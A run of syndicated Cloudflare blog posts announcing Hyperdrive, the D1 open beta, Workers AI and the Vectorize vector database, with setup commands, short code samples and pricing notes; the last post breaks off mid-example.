To demonstrate Hyperdrive’s performance, we built a demo application that makes back-to-back queries against the same database: both with Hyperdrive and without Hyperdrive (directly). The app selects a database in a neighboring continent: if you’re in Europe, it selects a database in the US — an all-too-common experience for many European Internet users — and if you’re in Africa, it selects a database in Europe (and so on). It returns raw results from a straightforward SELECT query, with no carefully selected averages or cherry-picked metrics.

Hyperdrive: making databases feel like they’re global
We built a demo app that makes real queries to a PostgreSQL database, with and without Hyperdrive

Throughout internal testing, initial user reports and the multiple runs in our benchmark, Hyperdrive delivers a 17 – 25x performance improvement vs. going direct to the database for cached queries, and a 6 – 8x improvement for uncached queries and writes. The cached latency might not surprise you, but we think that being 6 – 8x faster on uncached queries changes “I can’t query a centralized database from Cloudflare Workers” to “where has this been all my life?!”. We’re also continuing to work on performance improvements: we’ve already identified additional latency savings, and we’ll be pushing those out in the coming weeks.

The best part? Developers with a Workers paid plan can start using the Hyperdrive open beta immediately: there are no waiting lists or special sign-up forms to navigate.

Hyperdrive? Never heard of it?

We’ve been working on Hyperdrive in secret for a short while: but allowing developers to connect to databases they already have — with their existing data, queries and tooling — has been something on our minds for quite some time.

In a modern distributed cloud environment like Workers, where compute is globally distributed (so it’s close to users) and functions are short-lived (so you’re billed no more than is needed), connecting to traditional databases has been both slow and unscalable. Slow because it takes upwards of seven round-trips (TCP handshake; TLS negotiation; then auth) to establish the connection, and unscalable because databases like PostgreSQL have a high resource cost per connection. Even just a couple of hundred connections to a database can consume non-negligible memory, separate from any memory needed for queries.

Our friends over at Neon (a popular serverless Postgres provider) wrote about this, and even released a WebSocket proxy and driver to reduce the connection overhead, but are still fighting uphill in the snow: even with a custom driver, we’re down to 4 round-trips, each still potentially taking 50-200 milliseconds or more. When those connections are long-lived, that’s OK — it might happen once every few hours at best. But when they’re scoped to an individual function invocation, and are only useful for a few milliseconds to minutes at best — your code spends more time waiting. It’s effectively another kind of cold start: having to initiate a fresh connection to your database before making a query means that using a traditional database in a distributed or serverless environment is (to put it lightly) really slow.

To combat this, Hyperdrive does two things.

First, it maintains a set of regional database connection pools across Cloudflare’s network, so a Cloudflare Worker avoids making a fresh connection to a database on every request. Instead, the Worker can establish a connection to Hyperdrive (fast!), with Hyperdrive maintaining a pool of ready-to-go connections back to the database. Since a database can be anywhere from 30ms to (often) 300ms away over a single round-trip (let alone the seven or more you need for a new connection), having a pool of available connections dramatically reduces the latency issue that short-lived connections would otherwise suffer.

Second, it understands the difference between read (non-mutating) and write (mutating) queries and transactions, and can automatically cache your most popular read queries: which represent over 80% of most queries made to databases in typical web applications. That product listing page that tens of thousands of users visit every hour; open jobs on a major careers site; or even queries for config data that changes occasionally; a tremendous amount of what is queried does not change often, and caching it closer to where the user is querying it from can dramatically speed up access to that data for the next ten thousand users. Write queries, which can’t be safely cached, still get to benefit from both Hyperdrive’s connection pooling and Cloudflare’s global network: being able to take the fastest routes across the Internet across our backbone cuts down latency there, too.

Hyperdrive: making databases feel like they’re global
Even if your database is on the other side of the country, 70ms x 6 round-trips is a lot of time for a user to be waiting for a query response.

Hyperdrive works not only with PostgreSQL databases — including Neon, Google Cloud SQL, AWS RDS, and Timescale, but also PostgreSQL-compatible databases like Materialize (a powerful stream-processing database), CockroachDB (a major distributed database), Google Cloud’s AlloyDB, and AWS Aurora Postgres.

We’re also working on bringing support for MySQL, including providers like PlanetScale, by the end of the year, with more database engines planned in the future.

The magic connection string

One of the major design goals for Hyperdrive was the need for developers to keep using their existing drivers, query builder and ORM (Object-Relational Mapper) libraries. It wouldn’t have mattered how fast Hyperdrive was if we required you to migrate away from your favorite ORM and/or rewrite hundreds (or more) lines of code & tests to benefit from Hyperdrive’s performance.

To achieve this, we worked with the maintainers of popular open-source drivers — including node-postgres and Postgres.js — to help their libraries support Worker’s new TCP socket API, which is going through the standardization process, and we expect to see land in Node.js, Deno and Bun as well.

The humble database connection string is the shared language of database drivers, and typically takes on this format:

postgres://user:[email protected]:5432/postgres

The magic behind Hyperdrive is that you can start using it in your existing Workers applications, with your existing queries, just by swapping out your connection string for the one Hyperdrive generates instead.

Creating a Hyperdrive

With an existing database ready to go — in this example, we’ll use a Postgres database from Neon — it takes less than a minute to get Hyperdrive running (yes, we timed it).

If you don’t have an existing Cloudflare Workers project, you can quickly create one:

$ npm create cloudflare@latest
# Call the application "hyperdrive-demo"
# Choose "Hello World Worker" as your template

From here, we just need the database connection string for our database and a quick wrangler command-line invocation to have Hyperdrive connect to it.

# Using wrangler v3.8.0 or above
wrangler hyperdrive databases create a-faster-database --connection-string="postgres://user:[email protected]/neondb"

# This will return an ID: we'll use this in the next step

Add our Hyperdrive to the wrangler.toml configuration file for our Worker:

database_id = "cdb28782-0dfc-4aca-a445-a2c318fb26fd"

We can now write a Worker — or take an existing Worker script — and use Hyperdrive to speed up connections and queries to our existing database. We use node-postgres here, but we could just as easily use Drizzle ORM.

import { Client } from 'pg';

export interface Env {
	HYPERDRIVE: Hyperdrive;

export default {
	async fetch(request: Request, env: Env, ctx: ExecutionContext) {
		// Create a database client that connects to our database via Hyperdrive
		// Hyperdrive generates a unique connection string you can pass to
		// supported drivers, including node-postgres, Postgres.js, and the many
		// ORMs and query builders that use these drivers.
		const client = new Client({ connectionString: env.HYPERDRIVE.connectionString });

		try {
			// Connect to our database
			await client.connect();

			// A very simple test query
			let result = await client.query({ text: 'SELECT * FROM pg_tables' });

			// Return our result rows as JSON
			return Response.json({ result: result });
		} catch (e) {
			return Response.json({ error: JSON.stringify(e) }, { status: 500 });

The code above is intentionally simple, but hopefully you can see the magic: our database driver gets a connection string from Hyperdrive, and is none-the-wiser. It doesn’t need to know anything about Hyperdrive, we don’t have to toss out our favorite query builder library, and we can immediately realize the speed benefits when making queries.

Connections are automatically pooled and kept warm, our most popular queries are cached, and our entire application gets faster.

We’ve also built out guides for every major database provider to make it easy to get what you need from them (a connection string) into Hyperdrive.

Going fast can’t be cheap, right?

We think Hyperdrive is critical to accessing your existing databases when building on Cloudflare Workers: traditional databases were just never designed for a world where clients are globally distributed.

Hyperdrive’s connection pooling will always be free, for both database protocols we support today and new database protocols we add in the future. Just like DDoS protection and our global CDN, we think access to Hyperdrive’s core feature is too useful to hold back.

During the open beta, Hyperdrive itself will not incur any charges for usage, regardless of how you use it. We’ll be announcing more details on how Hyperdrive will be priced closer to GA (early in 2024), with plenty of notice.

Time to query

So where to from here for Hyperdrive?

We’re planning on bringing Hyperdrive to GA in early 2024 — and we’re focused on landing more controls over how we cache & automatically invalidate based on writes, detailed query and performance analytics (soon!), support for more database engines (including MySQL) as well as continuing to work on making it even faster.

We’re also working to enable private network connectivity via Magic WAN and Cloudflare Tunnel, so that you can connect to databases that aren’t (or can’t be) exposed to the public Internet.

To connect Hyperdrive to your existing database, visit our developer docs — it takes less than a minute to create a Hyperdrive and update existing code to use it. Join the #hyperdrive-beta channel in our Developer Discord to ask questions, surface bugs, and talk to our Product & Engineering teams directly.

Hyperdrive: making databases feel like they’re global

D1: open beta is here

Post Syndicated from Matt Silverlock original http://blog.cloudflare.com/d1-open-beta-is-here/

D1: open beta is here

D1: open beta is here

D1 is now in open beta, and the theme is “scale”: with higher per-database storage limits and the ability to create more databases, we’re unlocking the ability for developers to build production-scale applications on D1. Any developers with an existing paid Workers plan don’t need to lift a finger to benefit: we’ve retroactively applied this to all existing D1 databases.

If you missed the last D1 update back during Developer Week, the multitude of updates in the changelog, or are just new to D1 in general: read on.

Remind me: D1? Databases?

D1 our native serverless database, which we launched into alpha in November last year: the queryable database complement to Workers KV, Durable Objects and R2.

When we set out to build D1, we knew a few things for certain: it needed to be fast, it needed to be incredibly easy to create a database, and it needed to be SQL-based.

That last one was critical: so that developers could a) avoid learning another custom query language and b) make it easier for existing query buildings, ORM (object relational mapper) libraries and other tools to connect to D1 with minimal effort. From this, we’ve seen a huge number of projects build support in for D1: from support for D1 in the Drizzle ORM and Kysely, to the T4 App, a full-stack toolkit that uses D1 as its database.

We also knew that D1 couldn’t be the only way to query a database from Workers: for teams with existing databases and thousands of lines of SQL or existing ORM code, migrating across to D1 isn’t going to be an afternoon’s work. For those teams, we built Hyperdrive, allowing you to connect to your existing databases and make them feel global. We think this gives teams flexibility: combine D1 and Workers for globally distributed apps, and use Hyperdrive for querying the databases you have in legacy clouds and just can’t get rid of overnight.

Larger databases, and more of them

This has been the biggest ask from the thousands of D1 users throughout the alpha: not just more databases, but also bigger databases.

Developers on the Workers paid plan will now be able to grow each database up to 2GB and create 25 databases (up from 500MB and 10).

We’ll be continuing to work on unlocking even larger databases over the coming weeks and months: developers using the D1 beta will see automatic increases to these limits published on D1’s public changelog.

One of the biggest impediments to double-digit-gigabyte databases is performance: we want to ensure that a database can load in and be ready really quickly — cold starts of seconds (or more) just aren’t acceptable. A 10GB or 20GB database that takes 15 seconds before it can answer a query ends up being pretty frustrating to use.

Users on the Workers free plan will keep the ten 500MB databases (changelog) forever: we want to give more developers the room to experiment with D1 and Workers before jumping in.

Time Travel is here

Time Travel allows you to roll your database back to a specific point in time: specifically, any minute in the last 30 days. And it’s enabled by default for every D1 database, doesn’t cost any more, and doesn’t count against your storage limit.

For those who have been keeping tabs: we originally announced Time Travel earlier this year, and made it available to all D1 users in July. At its core, it’s deceptively simple: Time Travel introduces the concept of a “bookmark” to D1. A bookmark represents the state of a database at a specific point in time, and is effectively an append-only log. Time Travel can take a timestamp and turn it into a bookmark, or a bookmark directly: allowing you to restore back to that point. Even better: restoring doesn’t prevent you from going back further.

We think Time Travel works best with an example, so let’s make a change to a database: one with an Order table that stores every order made against our e-commerce store:

# To illustrate: we have 89,185 unique addresses in our order database.

# To illustrate: we have 89,185 unique addresses in our order database. 
➜  wrangler d1 execute northwind --command "SELECT count(distinct ShipAddress) FROM [Order]" 
│ count(*) │
│ 89185    │

OK, great. Now what if we wanted to make a change to a specific set of orders: an address change or freight company change?

# I think we might be forgetting something here...
➜  wrangler d1 execute northwind --command "UPDATE [Order] SET ShipAddress = 'Av. Veracruz 38, Roma Nte., Cuauhtémoc, 06700 Ciudad de México, CDMX, Mexico' 

Wait: we’ve made a mistake that many, many folks have before: we forgot the WHERE clause on our UPDATE query. Instead of updating a specific order Id, we’ve instead updated the ShipAddress for every order in our table.

# Every order is now going to a wine bar in Mexico City. 
➜  wrangler d1 execute northwind --command "SELECT count(distinct ShipAddress) FROM [Order]" 
│ count(*) │
│ 1        │

Panic sets in. Did we remember to make a backup before we did this? How long ago was it? Did we turn on point-in-time recovery? It seemed potentially expensive at the time…

It’s OK. We’re using D1. We can Time Travel. It’s on by default: let’s fix this and travel back a few minutes.

# Let's go back in time.
➜  wrangler d1 time-travel restore northwind --timestamp="2023-09-23T14:20:00Z"

🚧 Restoring database northwind from bookmark 0000000b-00000002-00004ca7-9f3dba64bda132e1c1706a4b9d44c3c9
✔ OK to proceed (y/N) … yes

⚡️ Time travel in progress...
✅ Database dash-db restored back to bookmark 00000000-00000004-00004ca7-97a8857d35583887de16219c766c0785
↩️ To undo this operation, you can restore to the previous bookmark: 00000013-ffffffff-00004ca7-90b029f26ab5bd88843c55c87b26f497

Let's check if it worked:

# Phew. We're good. 
➜  wrangler d1 execute northwind --command "SELECT count(distinct ShipAddress) FROM [Order]" 
│ count(*) │
│ 89185    │

We think that Time Travel becomes even more powerful when you have many smaller databases, too: the downsides of any restore operation is reduced further and scoped to a single user or tenant.

This is also just the beginning for Time Travel: we’re working to support not just only restoring a database, but also the ability to fork from and overwrite existing databases. If you can fork a database with a single command and/or test migrations and schema changes against real data, you can de-risk a lot of the traditional challenges that working with databases has historically implied.

Row-based pricing

Back in May we announced pricing for D1, to a lot of positive feedback around how much we’d included in our Free and Paid plans. In August, we published a new row-based model, replacing the prior byte-units, that makes it easier to predict and quantify your usage. Specifically, we moved to rows as it’s easier to reason about: if you’re writing a row, it doesn’t matter if it’s 1KB or 1MB. If your read query uses an indexed column to filter on, you’ll see not only performance benefits, but cost savings too.

Here’s D1’s pricing — almost everything has stayed the same, with the added benefit of charging based on rows:

D1: open beta is here
D1’s pricing — you can find more details in D1’s public documentation.

As before, D1 does not charge you for “database hours”, the number of databases, or point-in-time recovery (Time Travel) — just query D1 and pay for your reads, writes, and storage — that’s it.

We believe this makes D1 not only far more cost-efficient, but also makes it easier to manage multiple databases to isolate customer data or prod vs. staging: we don’t care which database you query. Manage your data how you like, separate your customer data, and avoid having to fall for the trap of “Billing Based Architecture”, where you build solely around how you’re charged, even if it’s not intuitive or what makes sense for your team.

To make it easier to both see how much a given query charges and when to optimize your queries with indexes, D1 also returns the number of rows a query read or wrote (or both) so that you can understand how it’s costing you in both cents and speed.

For example, the following query filters over orders based on date:

SELECT * FROM [Order] WHERE ShippedDate > '2016-01-22'" 

    "results": [],
    "success": true,
    "meta": {
      "duration": 5.032,
      "size_after": 33067008,
      "rows_read": 16818,
      "rows_written": 0

The unindexed query above scans 16,800 rows. Even if we don’t optimize it, D1 includes 25 billion queries per month for free, meaning we could make this query 1.4 million times for a whole month before having to worry about extra costs.

But we can do better with an index:

CREATE INDEX IF NOT EXISTS idx_orders_date ON [Order](ShippedDate)

With the index created, let’s see how many rows our query needs to read now:

SELECT * FROM [Order] WHERE ShippedDate > '2016-01-22'" 

    "results": [],
    "success": true,
    "meta": {
      "duration": 3.793,
             "size_after": 33067008,
      "rows_read": 417,
      "rows_written": 0

The same query with an index on the ShippedDate column reads just 417 rows: not only it is faster (duration is in milliseconds!), but it costs us less: we could run this query 59 million times per month before we’d have to pay any more than what the $5 Workers plan gives us.

D1 also exposes row counts via both the Cloudflare dashboard and our GraphQL analytics API: so not only can you look at this per-query when you’re tuning performance, but also break down query patterns across all of your databases.

D1 for Platforms

Throughout D1’s alpha period, we’ve both heard from and worked with teams who are excited about D1’s ability to scale out horizontally: the ability to deploy a database-per-customer (or user!) in order to keep data closer to where teams access it and more strongly isolate that data from their other users.

Teams building the next big thing on Workers for Platforms — think of it as “Functions as a Service, as a Service” — can use D1 to deploy a database per user — keeping customer data strongly separated from each other.

For example, and as one of the early adopters of D1, RONIN is building an edge-first content & data platform backed by a dedicated D1 database per customer, which allows customers to place data closer to users and provides each customer isolation from the queries of others.

Instead of spinning up and managing countless traditional database instances, RONIN uses D1 for Platforms to offer automatic infinite scalability at the edge. This allows RONIN to focus on providing a sleek, intuitive editing experience for your content & data.

When it comes to enabling “D1 for Platforms”, we’ve thought about this in a few ways from the very beginning:

  • Support for more than 100,000+ databases for Workers for Platforms users (there’s no limit, but if we said “unlimited” you might not believe us).
  • D1’s pricing – you don’t pay per-database or for “idle databases”. If you have a range of users, from thousands of QPS down to 1-2 every 10 minutes — you aren’t paying more for “database hours” on the less trafficked databases, or having to plan around spiky workloads across your user-base.
  • The ability to programmatically configure more databases via D1’s HTTP API and attach them to your Worker without re-deploying. There’s no “provisioning” delay, either: you create the database, and it’s immediately ready to query by you or your users.
  • Detailed per-database analytics, so you can understand which databases are being used and how they’re being queried via D1’s GraphQL analytics API.

If you’re building the next big platform on top of Workers & want to use D1 at scale — whether you’re part of the Workers Launchpad program or not — reach out.

What’s next for D1?

We’re setting a clear goal: we want to make D1 “generally available” (GA) for production use-cases by early next year (Q1 2024). Although you can already use D1 without a waitlist or approval process, we understand that the GA label is an important one for many when it comes to a database (and as do we).

Between now and GA, we’re working on some really key parts of the D1 vision, with a continued focus on reliability and performance.

One of the biggest remaining pieces of that vision is global read replication, which we wrote about earlier this year. Importantly, replication will be free, won’t multiply your storage consumption, and will still enable session consistency (read-your-writes). Part of D1’s mission is about getting data closer to where users are, and we’re excited to land it.

We’re also working to expand Time Travel, D1’s built-in point-in-time recovery capabilities, so that you can branch and/or clone a database from a specific point-in-time on the fly.

We’ll also be progressively opening up our limits around per-database storage, unlocking more storage per account, and the number of databases you can create over the rest of this year, so keep an eye on the D1 changelog (or your inbox).

In the meantime, if you haven’t yet used D1, you can get started right now, visit D1’s developer documentation to spark some ideas, or join the #d1-beta channel on our Developer Discord to talk to other D1 developers and our product-engineering team.

Workers AI: serverless GPU-powered inference on Cloudflare’s global network

Post Syndicated from Phil Wittig original http://blog.cloudflare.com/workers-ai/

Workers AI: serverless GPU-powered inference on Cloudflare’s global network

Workers AI: serverless GPU-powered inference on Cloudflare’s global network

If you're anywhere near the developer community, it's almost impossible to avoid the impact that AI’s recent advancements have had on the ecosystem. Whether you're using AI in your workflow to improve productivity, or you’re shipping AI based features to your users, it’s everywhere. The focus on AI improvements are extraordinary, and we’re super excited about the opportunities that lay ahead, but it's not enough.

Not too long ago, if you wanted to leverage the power of AI, you needed to know the ins and outs of machine learning, and be able to manage the infrastructure to power it.

As a developer platform with over one million active developers, we believe there is so much potential yet to be unlocked, so we’re changing the way AI is delivered to developers. Many of the current solutions, while powerful, are based on closed, proprietary models and don't address privacy needs that developers and users demand. Alternatively, the open source scene is exploding with powerful models, but they’re simply not accessible enough to every developer. Imagine being able to run a model, from your code, wherever it’s hosted, and never needing to find GPUs or deal with setting up the infrastructure to support it.

That's why we are excited to launch Workers AI – an AI inference as a service platform, empowering developers to run AI models with just a few lines of code, all powered by our global network of GPUs. It's open and accessible, serverless, privacy-focused, runs near your users, pay-as-you-go, and it's built from the ground up for a best in class developer experience.

Workers AI – making inference just work

We’re launching Workers AI to put AI inference in the hands of every developer, and to actually deliver on that goal, it should just work out of the box. How do we achieve that?

  • At the core of everything, it runs on the right infrastructure – our world-class network of GPUs
  • We provide off-the-shelf models that run seamlessly on our infrastructure
  • Finally, deliver it to the end developer, in a way that’s delightful. A developer should be able to build their first Workers AI app in minutes, and say “Wow, that’s kinda magical!”.

So what exactly is Workers AI? It’s another building block that we’re adding to our developer platform – one that helps developers run well-known AI models on serverless GPUs, all on Cloudflare’s trusted global network. As one of the latest additions to our developer platform, it works seamlessly with Workers + Pages, but to make it truly accessible, we’ve made it platform-agnostic, so it also works everywhere else, made available via a REST API.

Models you know and love

We’re launching with a curated set of popular, open source models, that cover a wide range of inference tasks:

  • Text generation (large language model): meta/llama-2-7b-chat-int8
  • Automatic speech recognition (ASR): openai/whisper
  • Translation: meta/m2m100-1.2
  • Text classification: huggingface/distilbert-sst-2-int8
  • Image classification: microsoft/resnet-50
  • Embeddings: baai/bge-base-en-v1.5

You can browse all available models in your Cloudflare dashboard, and soon you’ll be able to dive into logs and analytics on a per model basis!

Workers AI: serverless GPU-powered inference on Cloudflare’s global network

This is just the start, and we’ve got big plans. After launch, we’ll continue to expand based on community feedback. Even more exciting – in an effort to take our catalog from zero to sixty, we’re announcing a partnership with Hugging Face, a leading AI community + hub. The partnership is multifaceted, and you can read more about it here, but soon you’ll be able to browse and run a subset of the Hugging Face catalog directly in Workers AI.

Accessible to everyone

Part of the mission of our developer platform is to provide all the building blocks that developers need to build the applications of their dreams. Having access to the right blocks is just one part of it — as a developer your job is to put them together into an application. Our goal is to make that as easy as possible.

To make sure you could use Workers AI easily regardless of entry point, we wanted to provide access via: Workers or Pages to make it easy to use within the Cloudflare ecosystem, and via REST API if you want to use Workers AI with your current stack.

Here’s a quick CURL example that translates some text from English to French:

curl https://api.cloudflare.com/client/v4/accounts/{ACCOUNT_ID}/ai/run/@cf/meta/@cf/meta/m2m100-1.2b \
-H "Authorization: Bearer {API_TOKEN}" \
	-d '{ "text": "I'll have an order of the moule frites", "target_lang": "french" }'

And here are what the response looks like:

  "result": {
    "answer": "Je vais commander des moules frites"
  "success": true,

Use it with any stack, anywhere – your favorite Jamstack framework, Python + Django/Flask, Node.js, Ruby on Rails, the possibilities are endless. And deploy

Designed for developers

Developer experience is really important to us. In fact, most of this post has been about just that. Making sure it works out of the box. Providing popular models that just work. Being accessible to all developers whether you build and deploy with Cloudflare or elsewhere. But it’s more than that – the experience should be frictionless, zero to production should be fast, and it should feel good along the way.

Let’s walk through another example to show just how easy it is to use! We’ll run Llama 2, a popular large language model open sourced by Meta, in a worker.

We’ll assume you have some of the basics already complete (Cloudflare account, Node, NPM, etc.), but if you don’t this guide will get you properly set up!

1. Create a Workers project

Create a new project named workers-ai by running:

$ npm create cloudflare@latest

When setting up your workers-ai worker, answer the setup questions as follows:

  • Enter workers-ai for the app name
  • Choose Hello World script for the type of application
  • Select yes to using TypeScript
  • Select yes to using Git
  • Select no to deploying

Lastly navigate to your new app directory:

cd workers-ai

2. Connect Workers AI to your worker

Create a Workers AI binding, which allows your worker to access the Workers AI service without having to manage an API key yourself.

To bind Workers AI to your worker, add the following to the end of your wrangler.toml file:

binding = "AI" #available in your worker via env.AI

You can also bind Workers AI to a Pages Function. For more information, refer to Functions Bindings.

3. Install the Workers AI client library

npm install @cloudflare/ai --save-dev

4. Run an inference task in your worker

Update the source/index.ts with the following code:

import { Ai } from '@cloudflare/ai'
export default {
  async fetch(request, env) {
    const ai = new Ai(env.AI);
    const input = { prompt: "What's the origin of the phrase 'Hello, World'" };
    const output = await ai.run('@cf/meta/llama-2-7b-chat-int8', input );
    return new Response(JSON.stringify(output));

5. Develop locally with Wrangler

While in your project directory, test Workers AI locally by running:

$ npx wranlger dev --remote

Note – These models currently only run on Cloudflare’s network of GPUs (and not locally), so setting `–remote` above is a must, and you’ll be prompted to log in at this point.

Wrangler will give you a URL (most likely localhost:8787). Visit that URL, and you’ll see a response like this

  "response": "Hello, World is a common phrase used to test the output of a computer program, particularly in the early stages of programming. The phrase "Hello, World!" is often the first program that a beginner learns to write, and it is included in many programming language tutorials and textbooks as a way to introduce basic programming concepts. The origin of the phrase "Hello, World!" as a programming test is unclear, but it is believed to have originated in the 1970s. One of the earliest known references to the phrase is in a 1976 book called "The C Programming Language" by Brian Kernighan and Dennis Ritchie, which is considered one of the most influential books on the development of the C programming language.

6. Deploy your worker

Finally, deploy your worker to make your project accessible on the Internet:

$ npx wranlger dev --remote
# Outputs: https://workers-ai.<YOUR_SUBDOMAIN>.workers.dev

And that’s it. You can literally go from zero to deployed AI in minutes. This is obviously a simple example, but shows how easy it is to run Workers AI from any project.

Privacy by default

When Cloudflare was founded, our value proposition had three pillars: more secure, more reliable, and more performant. Over time, we’ve realized that a better Internet is also a more private Internet, and we want to play a role in building it.

That’s why Workers AI is private by default – we don’t train our models, LLM or otherwise, on your data or conversations, and our models don’t learn from your usage. You can feel confident using Workers AI in both personal and business settings, without having to worry about leaking your data. Other providers only offer this fundamental feature with their enterprise version. With us, it’s built in for everyone.

We’re also excited to support data localization in the future. To make this happen, we have an ambitious GPU rollout plan – we’re launching with seven sites today, roughly 100 by the end of 2023, and nearly everywhere by the end of 2024. Ultimately, this will empower developers to keep delivering killer AI features to their users, while staying compliant with their end users’ data localization requirements.

The power of the platform

Vector database – Vectorize

Workers AI is all about running Inference, and making it really easy to do so, but sometimes inference is only part of the equation. Large language models are trained on a fixed set of data, based on a snapshot at a specific point in the past, and have no context on your business or use case. When you submit a prompt, information specific to you can increase the quality of results, making it more useful and relevant. That’s why we’re also launching Vectorize, our vector database that’s designed to work seamlessly with Workers AI. Here’s a quick overview of how you might use Workers AI + Vectorize together.

Example: Use your data (knowledge base) to provide additional context to an LLM when a user is chatting with it.

  1. Generate initial embeddings: run your data through Workers AI using an embedding model. The output will be embeddings, which are numerical representations of those words.
  2. Insert those embeddings into Vectorize: this essentially seeds the vector database with your data, so we can later use it to retrieve embeddings that are similar to your users’ query
  3. Generate embedding from user question: when a user submits a question to your AI app, first, take that question, and run it through Workers AI using an embedding model.
  4. Get context from Vectorize: use that embedding to query Vectorize. This should output embeddings that are similar to your user’s question.
  5. Create context aware prompt: Now take the original text associated with those embeddings, and create a new prompt combining the text from the vector search, along with the original question
  6. Run prompt: run this prompt through Workers AI using an LLM model to get your final result

AI Gateway

That covers a more advanced use case. On the flip side, if you are running models elsewhere, but want to get more out of the experience, you can run those APIs through our AI gateway to get features like caching, rate-limiting, analytics and logging. These features can be used to protect your end point, monitor and optimize costs, and also help with data loss prevention. Learn more about AI gateway here.

Start building today

Try it out for yourself, and let us know what you think. Today we’re launching Workers AI as an open Beta for all Workers plans – free or paid. That said, it’s super early, so…

Warning – It’s an early beta

Usage is not currently recommended for production apps, and limits + access are subject to change.


We’re initially launching with limits on a per-model basis

  • @cf/meta/llama-2-7b-chat-int8: 5 reqs/min
  • All other modes are between 120-180 reqs/min

Checkout our docs for a full overview of our limits.


What we released today is just a small preview to give you a taste of what’s coming (we simply couldn’t hold back), but we’re looking forward to putting the full-throttle version of Workers AI in your hands.

We realize that as you approach building something, you want to understand: how much is this going to cost me? Especially with AI costs being so easy to get out of hand. So we wanted to share the upcoming pricing of Workers AI with you.

While we won’t be billing on day one, we are announcing what we expect our pricing will look like.

Users will be able to choose from two ways to run Workers AI:

  • Regular Twitch Neurons (RTN) – running wherever there's capacity at $0.01 / 1k neurons
  • Fast Twitch Neurons (FTN) – running at nearest user location at $1.25 / 1k neurons

You may be wondering — what’s a neuron?

Neurons are a way to measure AI output that always scales down to zero (if you get no usage, you will be charged for 0 neurons). To give you a sense of what you can accomplish with a thousand neurons, you can: generate 130 LLM responses, 830 image classifications, or 1,250 embeddings.

Our goal is to help our customers pay only for what they use, and choose the pricing that best matches their use case, whether it’s price or latency that is top of mind.

What’s on the roadmap?

Workers AI is just getting started, and we want your feedback to help us make it great. That said, there are some exciting things on the roadmap.

More models, please

We're launching with a solid set of models that just work, but will continue to roll out new models based on your feedback. If there’s a particular model you'd love to see on Workers AI, pop into our Discord and let us know!

In addition to that, we're also announcing a partnership with Hugging Face, and soon you'll be able to access and run a subset of the Hugging Face catalog directly from Workers AI.

Analytics + observability

Up to this point, we’ve been hyper focussed on one thing – making it really easy for any developer to run powerful AI models in just a few lines of code. But that’s only one part of the story. Up next, we’ll be working on some analytics and observability capabilities to give you insights into your usage + performance + spend on a per-model basis, plus the ability to fig into your logs if you want to do some exploring.

A road to global GPU coverage

Our goal is to be the best place to run inference on Region: Earth, so we're adding GPUs to our data centers as fast as we can.

We plan to be in 100 data centers by the end this year

Workers AI: serverless GPU-powered inference on Cloudflare’s global network

And nearly everywhere by the end of 2024

Workers AI: serverless GPU-powered inference on Cloudflare’s global network

We’re really excited to see you build – head over to our docs to get started.

If you need inspiration, want to share something you’re building, or have a question – pop into our Developer Discord.

Vectorize: a vector database for shipping AI-powered applications to production, fast

Post Syndicated from Matt Silverlock original http://blog.cloudflare.com/vectorize-vector-database-open-beta/

Vectorize: a vector database for shipping AI-powered applications to production, fast

Vectorize: a vector database for shipping AI-powered applications to production, fast

Vectorize is our brand-new vector database offering, designed to let you build full-stack, AI-powered applications entirely on Cloudflare’s global network: and you can start building with it right away. Vectorize is in open beta, and is available to any developer using Cloudflare Workers.

You can use Vectorize with Workers AI to power semantic search, classification, recommendation and anomaly detection use-cases directly with Workers, improve the accuracy and context of answers from LLMs (Large Language Models), and/or bring-your-own embeddings from popular platforms, including OpenAI and Cohere.

Visit Vectorize’s developer documentation to get started, or read on if you want to better understand what vector databases do and how Vectorize is different.

Why do I need a vector database?

Machine learning models can’t remember anything: only what they were trained on.

Vector databases are designed to solve this, by capturing how an ML model represents data — including structured and unstructured text, images and audio — and storing it in a way that allows you to compare against future inputs. This allows us to leverage the power of existing machine-learning models and LLMs (Large Language Models) for content they haven’t been trained on: which, given the tremendous cost of training models, turns out to be extremely powerful.

To better illustrate why a vector database like Vectorize is useful, let’s pretend they don’t exist, and see how painful it is to give context to an ML model or LLM for a semantic search or recommendation task. Our goal is to understand what content is similar to our query and return it: based on our own dataset.

  1. Our user query comes in: they’re searching for “how to write to R2 from Cloudflare Workers”
  2. We load up our entire documentation dataset — a thankfully “small” dataset at about 65,000 sentences, or 2.1 GB — and provide it alongside the query from our user. This allows the model to have the context it needs, based on our data.
  3. We wait.
  4. (A long time)
  5. We get our similarity scores back, with the sentences most similar to the user’s query, and then work to map those back to URLs before we return our search results.

… and then another query comes in, and we have to start this all over again.

In practice, this isn’t really possible: we can’t pass that much context in an API call (prompt) to most machine learning models, and even if we could, it’d take tremendous amounts of memory and time to process our dataset over-and-over again.

With a vector database, we don’t have to repeat step 2: we perform it once, or as our dataset updates, and use our vector database to provide a form of long-term memory for our machine learning model. Our workflow looks a little more like this:

  1. We load up our entire documentation dataset, run it through our model, and store the resulting vector embeddings in our vector database (just once).
  2. For each user query (and only the query) we ask the same model and retrieve a vector representation.
  3. We query our vector database with that query vector, which returns the vectors closest to our query vector.

If we looked at these two flows side by side, we can quickly see how inefficient and impractical it is to use our own dataset with an existing model without a vector database:

Vectorize: a vector database for shipping AI-powered applications to production, fast
Using a vector database to help machine learning models remember.

From this simple example, it’s probably starting to make some sense: but you might also be wondering why you need a vector database instead of just a regular database.

Vectors are the model’s representation of an input: how it maps that input to its internal structure, or “features”. Broadly, the more similar vectors are, the more similar the model believes those inputs to be based on how it extracts features from an input.

This is seemingly easy when we look at example vectors of only a handful of dimensions. But with real-world outputs, searching across 10,000 to 250,000 vectors, each potentially 1,536 dimensions wide, is non-trivial. This is where vector databases come in: to make search work at scale, vector databases use a specific class of algorithm, such as k-nearest neighbors (kNN) or other approximate nearest neighbor (ANN) algorithms to determine vector similarity.

And although vector databases are extremely useful when building AI and machine learning powered applications, they’re not only useful in those use-cases: they can be used for a multitude of classification and anomaly detection tasks. Knowing whether a query input is similar — or potentially dissimilar — from other inputs can power content moderation (does this match known-bad content?) and security alerting (have I seen this before?) tasks as well.

We built Vectorize to be a powerful partner to Workers AI: enabling you to run vector search tasks as close to users as possible, and without having to think about how to scale it for production.

We’re going to take a real world example — building a (product) recommendation engine for an e-commerce store — and simplify a few things.

Our goal is to show a list of “relevant products” on each product listing page: a perfect use-case for vector search. Our input vectors in the example are placeholders, but in a real world application we would generate them based on product descriptions and/or cart data by passing them through a sentence similarity model (such as Worker’s AI’s text embedding model)

